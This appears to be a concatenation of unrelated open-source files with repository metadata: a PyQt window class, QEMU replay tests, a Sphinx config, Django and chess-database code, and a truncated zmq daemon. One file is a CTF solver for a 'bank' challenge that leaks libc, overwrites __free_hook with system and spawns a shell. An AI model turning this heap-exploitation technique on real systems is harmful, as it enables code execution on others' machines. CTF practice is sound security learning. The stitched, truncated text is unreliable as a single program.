from __future__ import unicode_literals
from PyQt5.QtWidgets import QMainWindow, QStyleFactory, QApplication
from .E5Application import e5App
from . import E5MessageBox
class E5MainWindow(QMainWindow):
"""
Class implementing a main window with styling support.
"""
def __init__(self, parent=None):
"""
Constructor
@param parent reference to the parent widget (QWidget)
"""
super(E5MainWindow, self).__init__(parent)
self.defaultStyleName = QApplication.style().objectName()
def setStyle(self, styleName, styleSheetFile):
"""
Public method to set the style of the interface.
@param styleName name of the style to set (string)
@param styleSheetFile name of a style sheet file to read to overwrite
defaults of the given style (string)
"""
# step 1: set the style
style = None
if styleName != "System" and styleName in QStyleFactory.keys():
style = QStyleFactory.create(styleName)
if style is None:
style = QStyleFactory.create(self.defaultStyleName)
if style is not None:
QApplication.setStyle(style)
# step 2: set a style sheet
if styleSheetFile:
try:
f = open(styleSheetFile, "r", encoding="utf-8")
styleSheet = f.read()
f.close()
except (IOError, OSError) as msg:
E5MessageBox.warning(
self,
self.tr("Loading Style Sheet"),
self.tr(
"""<p>The Qt Style Sheet file <b>{0}</b> could"""
""" not be read.<br>Reason: {1}</p>""")
.format(styleSheetFile, str(msg)))
return
else:
styleSheet = ""
e5App().setStyleSheet(styleSheet)
| gpl-3.0 | 6,563,336,699,552,753,000 | 30.61194 | 77 | 0.557129 | false |
Qwaz/solved-hacking-problem | WhiteHat/2017 Quals/bank/solver.py | 1 | 1948 | from pwn import *
from time import sleep
def wait_menu():
p.recvuntil('---> ')
def show_my_info():
wait_menu()
p.sendline('1')
def transfer(bank, amount):
wait_menu()
p.sendline('2')
wait_menu()
p.sendline(str(bank))
wait_menu()
p.sendline(str(amount))
def deposit(bank, amount):
wait_menu()
p.sendline('3')
wait_menu()
p.sendline(str(bank))
wait_menu()
p.sendline(str(amount))
def withdraw(bank, amount):
wait_menu()
p.sendline('4')
wait_menu()
p.sendline(str(bank))
wait_menu()
p.sendline(str(amount))
def buy_item(item):
wait_menu()
p.sendline('5')
wait_menu()
p.sendline(str(item))
def change_item_name(index, name):
wait_menu()
p.sendline('6')
wait_menu()
p.sendline(str(index))
wait_menu()
p.sendline(name)
MALLOC_OFFSET = 0x84130
SYSTEM_OFFSET = 0x45390
FREE_HOOK = 0x3c67a8
p = process('./bank', raw=False)
# p = remote('challenges.whitehatcontest.kr', 9999)
deposit(1, 800)
for i in range(5):
transfer(1, 0)
withdraw(1, 800)
withdraw(1, 800)
withdraw(1, 1000000000000000000*5)
sleep(3)
buy_item(1)
change_item_name(0, '/bin/sh'.ljust(32, '\x00'))
for i in range(15):
buy_item(1)
change_item_name(i+1, 'A'*32)
buy_item(1)
change_item_name(16, p64(0x602fd8))
wait_menu()
p.sendline(str(1))
p.recvuntil('* Account Number : ')
malloc_leak = u64(p.recvline().strip().ljust(8, '\x00'))
log.success('malloc: 0x%x' % malloc_leak)
libc_base = malloc_leak - MALLOC_OFFSET
log.success('libc: 0x%x' % libc_base)
change_item_name(16, p64(0x603180))
wait_menu()
p.sendline('5')
wait_menu()
p.sendline('\xff')
wait_menu()
p.sendline(str(1))
p.sendline(p64(0))
change_item_name(16, p64(libc_base + FREE_HOOK))
wait_menu()
p.sendline('5')
wait_menu()
p.sendline('\xff')
wait_menu()
p.sendline(str(1))
p.sendline(p64(libc_base + SYSTEM_OFFSET))
wait_menu()
p.sendline('7')
p.interactive()
| gpl-2.0 | -6,671,868,945,516,682,000 | 15.649573 | 56 | 0.632444 | false |
dslutz/qemu | tests/acceptance/replay_kernel.py | 3 | 12508 | # Record/replay test that boots a Linux kernel
#
# Copyright (c) 2020 ISP RAS
#
# Author:
# Pavel Dovgalyuk <[email protected]>
#
# This work is licensed under the terms of the GNU GPL, version 2 or
# later. See the COPYING file in the top-level directory.
import os
import logging
import time
from avocado import skipIf
from avocado_qemu import wait_for_console_pattern
from avocado.utils import archive
from avocado.utils import process
from boot_linux_console import LinuxKernelTest
class ReplayKernel(LinuxKernelTest):
"""
Boots a Linux kernel in record mode and checks that the console
is operational and the kernel command line is properly passed
from QEMU to the kernel.
Then replays the same scenario and verifies, that QEMU correctly
terminates.
"""
timeout = 90
KERNEL_COMMON_COMMAND_LINE = 'printk.time=1 panic=-1 '
def run_vm(self, kernel_path, kernel_command_line, console_pattern,
record, shift, args, replay_path):
logger = logging.getLogger('replay')
start_time = time.time()
vm = self.get_vm()
vm.set_console()
if record:
logger.info('recording the execution...')
mode = 'record'
else:
logger.info('replaying the execution...')
mode = 'replay'
vm.add_args('-icount', 'shift=%s,rr=%s,rrfile=%s' %
(shift, mode, replay_path),
'-kernel', kernel_path,
'-append', kernel_command_line,
'-net', 'none',
'-no-reboot')
if args:
vm.add_args(*args)
vm.launch()
self.wait_for_console_pattern(console_pattern, vm)
if record:
vm.shutdown()
logger.info('finished the recording with log size %s bytes'
% os.path.getsize(replay_path))
else:
vm.wait()
logger.info('successfully finished the replay')
elapsed = time.time() - start_time
logger.info('elapsed time %.2f sec' % elapsed)
return elapsed
def run_rr(self, kernel_path, kernel_command_line, console_pattern,
shift=7, args=None):
replay_path = os.path.join(self.workdir, 'replay.bin')
t1 = self.run_vm(kernel_path, kernel_command_line, console_pattern,
True, shift, args, replay_path)
t2 = self.run_vm(kernel_path, kernel_command_line, console_pattern,
False, shift, args, replay_path)
logger = logging.getLogger('replay')
logger.info('replay overhead {:.2%}'.format(t2 / t1 - 1))
@skipIf(os.getenv('GITLAB_CI'), 'Running on GitLab')
def test_x86_64_pc(self):
"""
:avocado: tags=arch:x86_64
:avocado: tags=machine:pc
"""
kernel_url = ('https://archives.fedoraproject.org/pub/archive/fedora'
'/linux/releases/29/Everything/x86_64/os/images/pxeboot'
'/vmlinuz')
kernel_hash = '23bebd2680757891cf7adedb033532163a792495'
kernel_path = self.fetch_asset(kernel_url, asset_hash=kernel_hash)
kernel_command_line = self.KERNEL_COMMON_COMMAND_LINE + 'console=ttyS0'
console_pattern = 'VFS: Cannot open root device'
self.run_rr(kernel_path, kernel_command_line, console_pattern, shift=5)
def test_aarch64_virt(self):
"""
:avocado: tags=arch:aarch64
:avocado: tags=machine:virt
:avocado: tags=cpu:cortex-a53
"""
kernel_url = ('https://archives.fedoraproject.org/pub/archive/fedora'
'/linux/releases/29/Everything/aarch64/os/images/pxeboot'
'/vmlinuz')
kernel_hash = '8c73e469fc6ea06a58dc83a628fc695b693b8493'
kernel_path = self.fetch_asset(kernel_url, asset_hash=kernel_hash)
kernel_command_line = (self.KERNEL_COMMON_COMMAND_LINE +
'console=ttyAMA0')
console_pattern = 'VFS: Cannot open root device'
self.run_rr(kernel_path, kernel_command_line, console_pattern,
args=('-cpu', 'cortex-a53'))
def test_arm_virt(self):
"""
:avocado: tags=arch:arm
:avocado: tags=machine:virt
"""
kernel_url = ('https://archives.fedoraproject.org/pub/archive/fedora'
'/linux/releases/29/Everything/armhfp/os/images/pxeboot'
'/vmlinuz')
kernel_hash = 'e9826d741b4fb04cadba8d4824d1ed3b7fb8b4d4'
kernel_path = self.fetch_asset(kernel_url, asset_hash=kernel_hash)
kernel_command_line = (self.KERNEL_COMMON_COMMAND_LINE +
'console=ttyAMA0')
console_pattern = 'VFS: Cannot open root device'
self.run_rr(kernel_path, kernel_command_line, console_pattern, shift=1)
@skipIf(os.getenv('GITLAB_CI'), 'Running on GitLab')
def test_arm_cubieboard_initrd(self):
"""
:avocado: tags=arch:arm
:avocado: tags=machine:cubieboard
"""
deb_url = ('https://apt.armbian.com/pool/main/l/'
'linux-4.20.7-sunxi/linux-image-dev-sunxi_5.75_armhf.deb')
deb_hash = '1334c29c44d984ffa05ed10de8c3361f33d78315'
deb_path = self.fetch_asset(deb_url, asset_hash=deb_hash)
kernel_path = self.extract_from_deb(deb_path,
'/boot/vmlinuz-4.20.7-sunxi')
dtb_path = '/usr/lib/linux-image-dev-sunxi/sun4i-a10-cubieboard.dtb'
dtb_path = self.extract_from_deb(deb_path, dtb_path)
initrd_url = ('https://github.com/groeck/linux-build-test/raw/'
'2eb0a73b5d5a28df3170c546ddaaa9757e1e0848/rootfs/'
'arm/rootfs-armv5.cpio.gz')
initrd_hash = '2b50f1873e113523967806f4da2afe385462ff9b'
initrd_path_gz = self.fetch_asset(initrd_url, asset_hash=initrd_hash)
initrd_path = os.path.join(self.workdir, 'rootfs.cpio')
archive.gzip_uncompress(initrd_path_gz, initrd_path)
kernel_command_line = (self.KERNEL_COMMON_COMMAND_LINE +
'console=ttyS0,115200 '
'usbcore.nousb '
'panic=-1 noreboot')
console_pattern = 'Boot successful.'
self.run_rr(kernel_path, kernel_command_line, console_pattern, shift=1,
args=('-dtb', dtb_path,
'-initrd', initrd_path,
'-no-reboot'))
def test_ppc64_pseries(self):
"""
:avocado: tags=arch:ppc64
:avocado: tags=machine:pseries
"""
kernel_url = ('https://archives.fedoraproject.org/pub/archive'
'/fedora-secondary/releases/29/Everything/ppc64le/os'
'/ppc/ppc64/vmlinuz')
kernel_hash = '3fe04abfc852b66653b8c3c897a59a689270bc77'
kernel_path = self.fetch_asset(kernel_url, asset_hash=kernel_hash)
kernel_command_line = self.KERNEL_COMMON_COMMAND_LINE + 'console=hvc0'
# icount is not good enough for PPC64 for complete boot yet
console_pattern = 'Kernel command line: %s' % kernel_command_line
self.run_rr(kernel_path, kernel_command_line, console_pattern)
def test_m68k_q800(self):
"""
:avocado: tags=arch:m68k
:avocado: tags=machine:q800
"""
deb_url = ('https://snapshot.debian.org/archive/debian-ports'
'/20191021T083923Z/pool-m68k/main'
'/l/linux/kernel-image-5.3.0-1-m68k-di_5.3.7-1_m68k.udeb')
deb_hash = '044954bb9be4160a3ce81f8bc1b5e856b75cccd1'
deb_path = self.fetch_asset(deb_url, asset_hash=deb_hash)
kernel_path = self.extract_from_deb(deb_path,
'/boot/vmlinux-5.3.0-1-m68k')
kernel_command_line = (self.KERNEL_COMMON_COMMAND_LINE +
'console=ttyS0 vga=off')
console_pattern = 'No filesystem could mount root'
self.run_rr(kernel_path, kernel_command_line, console_pattern)
def do_test_advcal_2018(self, file_path, kernel_name, args=None):
archive.extract(file_path, self.workdir)
for entry in os.scandir(self.workdir):
if entry.name.startswith('day') and entry.is_dir():
kernel_path = os.path.join(entry.path, kernel_name)
break
kernel_command_line = ''
console_pattern = 'QEMU advent calendar'
self.run_rr(kernel_path, kernel_command_line, console_pattern,
args=args)
def test_arm_vexpressa9(self):
"""
:avocado: tags=arch:arm
:avocado: tags=machine:vexpress-a9
"""
tar_hash = '32b7677ce8b6f1471fb0059865f451169934245b'
tar_url = ('https://www.qemu-advent-calendar.org'
'/2018/download/day16.tar.xz')
file_path = self.fetch_asset(tar_url, asset_hash=tar_hash)
dtb_path = self.workdir + '/day16/vexpress-v2p-ca9.dtb'
self.do_test_advcal_2018(file_path, 'winter.zImage',
args=('-dtb', dtb_path))
def test_m68k_mcf5208evb(self):
"""
:avocado: tags=arch:m68k
:avocado: tags=machine:mcf5208evb
"""
tar_hash = 'ac688fd00561a2b6ce1359f9ff6aa2b98c9a570c'
tar_url = ('https://www.qemu-advent-calendar.org'
'/2018/download/day07.tar.xz')
file_path = self.fetch_asset(tar_url, asset_hash=tar_hash)
self.do_test_advcal_2018(file_path, 'sanity-clause.elf')
def test_microblaze_s3adsp1800(self):
"""
:avocado: tags=arch:microblaze
:avocado: tags=machine:petalogix-s3adsp1800
"""
tar_hash = '08bf3e3bfb6b6c7ce1e54ab65d54e189f2caf13f'
tar_url = ('https://www.qemu-advent-calendar.org'
'/2018/download/day17.tar.xz')
file_path = self.fetch_asset(tar_url, asset_hash=tar_hash)
self.do_test_advcal_2018(file_path, 'ballerina.bin')
def test_ppc64_e500(self):
"""
:avocado: tags=arch:ppc64
:avocado: tags=machine:ppce500
:avocado: tags=cpu:e5500
"""
tar_hash = '6951d86d644b302898da2fd701739c9406527fe1'
tar_url = ('https://www.qemu-advent-calendar.org'
'/2018/download/day19.tar.xz')
file_path = self.fetch_asset(tar_url, asset_hash=tar_hash)
self.do_test_advcal_2018(file_path, 'uImage', ('-cpu', 'e5500'))
def test_ppc_g3beige(self):
"""
:avocado: tags=arch:ppc
:avocado: tags=machine:g3beige
"""
tar_hash = 'e0b872a5eb8fdc5bed19bd43ffe863900ebcedfc'
tar_url = ('https://www.qemu-advent-calendar.org'
'/2018/download/day15.tar.xz')
file_path = self.fetch_asset(tar_url, asset_hash=tar_hash)
self.do_test_advcal_2018(file_path, 'invaders.elf',
args=('-M', 'graphics=off'))
def test_ppc_mac99(self):
"""
:avocado: tags=arch:ppc
:avocado: tags=machine:mac99
"""
tar_hash = 'e0b872a5eb8fdc5bed19bd43ffe863900ebcedfc'
tar_url = ('https://www.qemu-advent-calendar.org'
'/2018/download/day15.tar.xz')
file_path = self.fetch_asset(tar_url, asset_hash=tar_hash)
self.do_test_advcal_2018(file_path, 'invaders.elf',
args=('-M', 'graphics=off'))
def test_sparc_ss20(self):
"""
:avocado: tags=arch:sparc
:avocado: tags=machine:SS-20
"""
tar_hash = 'b18550d5d61c7615d989a06edace051017726a9f'
tar_url = ('https://www.qemu-advent-calendar.org'
'/2018/download/day11.tar.xz')
file_path = self.fetch_asset(tar_url, asset_hash=tar_hash)
self.do_test_advcal_2018(file_path, 'zImage.elf')
def test_xtensa_lx60(self):
"""
:avocado: tags=arch:xtensa
:avocado: tags=machine:lx60
:avocado: tags=cpu:dc233c
"""
tar_hash = '49e88d9933742f0164b60839886c9739cb7a0d34'
tar_url = ('https://www.qemu-advent-calendar.org'
'/2018/download/day02.tar.xz')
file_path = self.fetch_asset(tar_url, asset_hash=tar_hash)
self.do_test_advcal_2018(file_path, 'santas-sleigh-ride.elf',
args=('-cpu', 'dc233c'))
| gpl-2.0 | 1,474,124,330,567,337,700 | 40.554817 | 79 | 0.584346 | false |
jhartz/masterchess | MasterChess/__init__.py | 1 | 2533 | """
MasterChess library
Copyright (C) 2013 Jake Hartz
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Usage:
Import MasterChess and call open_database to get a mc ("MasterChess") instance
Requires Python >= 2.5 and < 3
"""
"""
"outcome" values for matches:
0 - white win
1 - black win
2 - stalemate
3 - draw
"""
import sys, sqlite3
from mc import mc
__author__ = "Jake Hartz"
__copyright__ = "Copyright (C) 2013 Jake Hartz"
__license__ = "GPL"
__version__ = "1.0"
def open_database(path):
"""Check and set up database based on "path", then return an mc ("MasterChess") instance."""
try:
conn = sqlite3.connect(path)
if conn:
players = conn.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='players';")
if len(players.fetchall()) == 0:
conn.execute("CREATE TABLE 'players' (id INTEGER PRIMARY KEY, deleted INTEGER, first_name TEXT, last_name TEXT, grade INTEGER);")
matches = conn.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='matches';")
if len(matches.fetchall()) == 0:
conn.execute("CREATE TABLE 'matches' (id INTEGER PRIMARY KEY, enabled INTEGER, timestamp INTEGER, white_player INTEGER, black_player INTEGER, outcome INTEGER);")
prefs = conn.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='prefs';")
if len(prefs.fetchall()) == 0:
conn.execute("CREATE TABLE 'prefs' (name TEXT UNIQUE NOT NULL, value TEXT);")
conn.commit()
conn.close()
mc_instance = mc(path)
if mc_instance:
return mc_instance
else:
print >> sys.stderr, "open_database WARNING:", "No mc; received:", mc_instance
except:
exc_type, exc_value = sys.exc_info()[:2]
print >> sys.stderr, "open_database ERROR:", exc_type, exc_value | gpl-3.0 | -2,665,703,317,323,300,000 | 35.2 | 177 | 0.647059 | false |
mislavcimpersak/django-real-content | docs/conf.py | 1 | 9298 | # -*- coding: utf-8 -*-
#
# django-real-content documentation build configuration file, created by
# sphinx-quickstart on Sun Jun 14 13:31:41 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'django-real-content'
copyright = u'2015, Mislav Cimperšak'
author = u'Mislav Cimperšak'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1.4'
# The full version, including alpha/beta/rc tags.
release = '0.1.4'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'django-real-contentdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'django-real-content.tex', u'django-real-content Documentation',
u'Mislav Cimperšak', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'django-real-content', u'django-real-content Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'django-real-content', u'django-real-content Documentation',
author, 'django-real-content', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| mit | 1,171,087,526,966,120,000 | 31.728873 | 79 | 0.709091 | false |
Ircam-Web/mezzanine-organization | organization/network/management/commands/import-ircam-project.py | 1 | 8883 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2016-2017 Ircam
# Copyright (c) 2016-2017 Guillaume Pellerin
# Copyright (c) 2016-2017 Emilie Zawadzki
# This file is part of mezzanine-organization.
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import sys
import csv
import re
import logging
import datetime
from optparse import make_option
import xlrd
from itertools import takewhile
from re import findall
import dateutil.parser
# from string import split
from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
from django.contrib.auth.models import User
from django.db.models import Q
from organization.core.models import *
from organization.network.models import *
from organization.projects.models import *
class Logger:
def __init__(self, file):
self.logger = logging.getLogger('myapp')
self.hdlr = logging.FileHandler(file)
self.formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
self.hdlr.setFormatter(self.formatter)
self.logger.addHandler(self.hdlr)
self.logger.setLevel(logging.INFO)
def info(self, prefix, message):
self.logger.info(' ' + prefix + ' : ' + message)
def error(self, prefix, message):
self.logger.error(prefix + ' : ' + message)
def get_instance(model, field, value):
models = model.objects.filter(field=value)
if models:
return models[0]
else:
model = model()
model.field = value
return model
def format_message(project):
message = str(project.id) + " | "
message += project.title + " | "
message += project.external_id if project.external_id else "None"
return message
class IrcamXLS:
sheet_id = 0
project_table_1_first_row = 12
project_table_1_last_row = 25
project_table_2_first_row = 34
project_table_2_last_row = 90
nb_col_max = 9
nb_col_min = 0
avoid_col = 3
def __init__(self, file):
self.book = xlrd.open_workbook(file)
self.sheet = self.book.sheet_by_index(self.sheet_id)
class IrcamProjects(object):
def __init__(self, project_name):
print("project", project_name)
project, is_created = Project.objects.get_or_create(title=project_name)
self.project = project
self.is_created = is_created
if self.is_created:
self.project.title = project_name
def set_external_id(self, external_id):
if external_id and self.project.external_id is None:
if isinstance(external_id, float):
external_id = str(int(external_id))
external_id = re.sub(r'((\s)*(-)(\s)*)|(\s)', '-', external_id)
self.project.external_id = external_id
def set_call_project(self, call):
if call and self.project.call is None:
project_call, is_created = ProjectCall.objects.get_or_create(name__icontains=call)
if is_created:
project_call.name = call
project_call.save()
self.project.call = project_call
def set_date_from(self, date_from):
if date_from and self.project.date_from is None:
self.project.date_from = date_from
def set_date_to(self, date_to):
if date_to and self.project.date_to is None:
self.project.date_to = date_to
def set_lead_organization(self, lead_organization):
if lead_organization and self.project.lead_organization is None:
lo, is_created = Organization.objects.get_or_create(name=lead_organization)
self.project.lead_organization = lo
def set_referring_person(self, referring_person):
if referring_person and self.project.referring_person is None:
referring_person_list = re.split(r'\s*/\s*', referring_person, 1)
for rp in referring_person_list:
rp_whole_name = re.split(r'\s*', rp, 1)
last_name = max(rp_whole_name, key=len)
initial_first_name = min(rp_whole_name, key=len)
initial_first_name = re.sub(r'\.', '', initial_first_name)
persons = Person.objects.filter(last_name__icontains=last_name)
for person in persons:
if person.first_name[0] == initial_first_name:
self.project.referring_person.add(person)
def set_teams(self, lead_teams):
if lead_teams and self.project.lead_team is None:
lead_teams_list = re.split(r'\s*,\s*', lead_teams, 1)
for lt in lead_teams_list:
t, is_created = Team.objects.get_or_create(code__icontains=lt)
if is_created:
t.title = lt
t.save()
self.project.teams.add(t)
def set_manager(self, manager):
if manager and self.project.manager is None :
manager_whole_name = re.split(r'\s*', manager, 1)
last_name = max(manager_whole_name, key=len)
initial_first_name = min(manager_whole_name, key=len)
initial_first_name = re.sub(r'\.', '', initial_first_name)
persons = Person.objects.filter(last_name__icontains=last_name)
for person in persons:
if person.first_name[0] == initial_first_name:
self.project.manager.add(person)
def save_project(self):
self.project.save()
class Command(BaseCommand):
help = """Import Person data from IRCAM's legacy XLS management file.
python manage.py import-ircam-project -s /srv/backup/projects_rd_jan17.xlsx
"""
option_list = BaseCommand.option_list + (
make_option('-d', '--dry-run',
action='store_true',
dest='dry-run',
help='Do NOT write anything'),
make_option('-f', '--force',
action='store_true',
dest='force',
help='Force overwrite data'),
make_option('-s', '--source',
dest='source_file',
help='define the XLS source file'),
make_option('-l', '--log',
dest='log',
help='define log file'),
)
def handle(self, *args, **kwargs):
self.logger = Logger(kwargs.get('log'))
self.pattern = kwargs.get('pattern')
self.source_file = os.path.abspath(kwargs.get('source_file'))
self.dry_run = kwargs.get('dry-run')
self.force = kwargs.get('force')
xls = IrcamXLS(self.source_file)
# Table 1
for row_index in range(xls.project_table_1_first_row, xls.project_table_1_last_row):
ip = IrcamProjects(xls.sheet.cell_value(row_index, 0))
ip.set_external_id(xls.sheet.cell_value(row_index, 1))
ip.set_call_project(xls.sheet.cell_value(row_index, 2))
ip.set_date_from(xlrd.xldate.xldate_as_datetime(xls.sheet.cell_value(row_index, 4), 1))
ip.set_date_to(xlrd.xldate.xldate_as_datetime(xls.sheet.cell_value(row_index, 5), 1))
ip.set_lead_organization(xls.sheet.cell_value(row_index, 6))
ip.set_referring_person(xls.sheet.cell_value(row_index, 7))
ip.set_teams(xls.sheet.cell_value(row_index, 8))
ip.set_manager(xls.sheet.cell_value(row_index, 9))
ip.save_project()
self.logger.info('Project', format_message(ip.project))
# Table 2
for row_index in range(xls.project_table_2_first_row, xls.project_table_2_last_row):
ip = IrcamProjects(xls.sheet.cell_value(row_index, 0))
ip.set_external_id(xls.sheet.cell_value(row_index, 1))
ip.set_call_project(xls.sheet.cell_value(row_index, 2))
ip.set_date_from(xlrd.xldate.xldate_as_datetime(xls.sheet.cell_value(row_index, 4), 1))
ip.set_date_to(xlrd.xldate.xldate_as_datetime(xls.sheet.cell_value(row_index, 5), 1))
ip.set_lead_organization(xls.sheet.cell_value(row_index, 6))
ip.set_referring_person(xls.sheet.cell_value(row_index, 7))
ip.set_teams(xls.sheet.cell_value(row_index, 8))
ip.set_manager(xls.sheet.cell_value(row_index, 9))
ip.save_project()
self.logger.info('Project', format_message(ip.project))
| agpl-3.0 | -1,341,572,315,020,319,200 | 36.0125 | 99 | 0.620061 | false |
vsilent/smarty-bot | example/daemon.py | 1 | 2773 | from sys import exit
#from multiprocessing import Process
#from core.config import settings
from core.config.settings import logger
import zmq
class Daemon():
sock = None
bsock = None
response = {}
def __init__(self, name="undefined"):
"""docstring for __init__"""
context = zmq.Context()
self.sock = context.socket(zmq.REP)
self.sock.bind('ipc:///tmp/smarty-%s' % name)
#self.sock.connect('ipc:///tmp/smarty-%s' % name)
#self.bsock = context.socket(zmq.REQ)
#self.bsock.connect('ipc:///tmp/smarty-brain')
#self.response = {
#'text': "error",
#'jmsg': 'error',
#'type': 'response'}
def start(self):
while True:
msg = self.sock.recv_json()
cmd = msg.get('cmd', None)
if cmd == 'terminate':
self.response['text'] = 'terminated'
self.sock.send_json(self.response)
break
if cmd:
response = self.process_command(cmd)
logger.info('daemon responded with %s' % response)
self.sock.send_json(response)
exit()
def process_command(self, cmd):
"""docstring for process"""
if cmd == 'run':
